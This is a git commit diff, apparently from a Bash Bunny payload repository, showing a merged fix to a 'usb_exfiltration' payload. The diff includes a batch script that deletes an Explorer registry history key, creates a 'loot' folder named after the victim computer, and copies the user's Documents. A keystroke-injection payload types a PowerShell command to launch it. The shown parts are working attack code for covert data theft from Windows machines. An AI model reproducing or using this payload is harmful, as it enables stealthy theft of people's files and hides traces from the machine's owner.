Merge pull request #17 from honourity/master
usb_exfiltration - added escape character for quack command variablepull/37/head
commit
21848f89cd
|
@ -6,7 +6,7 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
|
||||||
|
|
||||||
REM Creates directory compromised of computer name, date and time
|
REM Creates directory compromised of computer name, date and time
|
||||||
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
|
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
|
||||||
set dst=%~dp0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
|
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
|
||||||
mkdir %dst% >>nul
|
mkdir %dst% >>nul
|
||||||
|
|
||||||
if Exist %USERPROFILE%\Documents (
|
if Exist %USERPROFILE%\Documents (
|
||||||
|
|
|
@ -18,6 +18,6 @@ LED R
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
QUACK GUI r
|
QUACK GUI r
|
||||||
QUACK DELAY 100
|
QUACK DELAY 100
|
||||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')"
|
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
LED G
|
LED G
|
||||||
|
|
Loading…
Reference in New Issue